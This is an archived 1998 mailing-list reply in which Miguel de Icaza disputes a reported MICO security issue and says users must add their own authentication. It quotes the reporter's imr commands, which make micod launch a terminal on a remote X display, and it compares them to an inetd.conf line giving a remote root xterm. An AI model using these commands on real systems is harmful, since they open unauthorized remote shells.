Re: MICO: security problem: Privileges of micod for everybody!

From: Miguel de Icaza (miguelat_private)
Date: Sun May 10 1998 - 15:10:30 PDT

    > (micod ist started on inet:winkelklinke.local:8888)
    > (hacking from enfin.local, which has X on display :0)
    >
    > imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared
    > "kterm -display enfin.local:0 & echo" IDL:Anything:1.0
    > imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play

    I would not consider this an explot, I would consider this just not
    understanding what you are doing.

    This `exploit' is equivalent to putting in your /etc/inetd.conf:

    service stream tcp nowait root /usr/X11R6/bin/xterm -display somehost:0

    Users of MICO need to implement their own authentication systems
    (which we do, for those who care about the panel).

    Best wishes,
    Miguel.